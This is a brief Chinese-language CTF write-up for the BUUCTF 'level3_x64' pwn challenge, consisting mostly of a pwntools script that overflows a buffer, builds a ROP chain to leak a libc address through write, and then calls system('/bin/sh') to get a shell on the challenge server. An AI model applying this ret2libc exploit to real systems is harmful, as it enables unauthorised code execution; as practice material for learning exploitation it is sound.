直接wp吧,没什么好说的真的,前面做挺多了,我这次换个函数打got表好了,rop里没有rdx,有赌的成分,不过也在情理之中了
from pwn import*from LibcSearcher import*context.log_level = 'debug'#io = process('./level3_x64')io = remote("node4.buuoj.cn",25102)#gdb.attach(io)elf =ELF('./level3_x64')write_plt = elf.plt['write']write_got = elf.got['write']__libc_start_main_got =elf.got['__libc_start_main']pop_rdi = 0x00000000004006b3pop_rsi_r15 =0x00000000004006b1main_addr = elf.sym['main']payload = b'a'*0x88 + p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(__libc_start_main_got)+p64(0)+p64(write_plt)+p64(main_addr)io.sendafter('Input:\n',payload)#pause()__libc_start_main_addr = u64(io.recv(6).ljust(8,'\x00'))log.success('libc ==>'+hex(__libc_start_main_addr))libc = LibcSearcher('__libc_start_main',__libc_start_main_addr)libcbase = __libc_start_main_addr - libc.dump('__libc_start_main')system_addr = libcbase +libc.dump('system')bin_sh = libcbase +libc.dump('str_bin_sh')payload = b'a'*(0x88)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)io.sendline(payload)io.interactive()
若有收获,就点个赞吧
0 人点赞
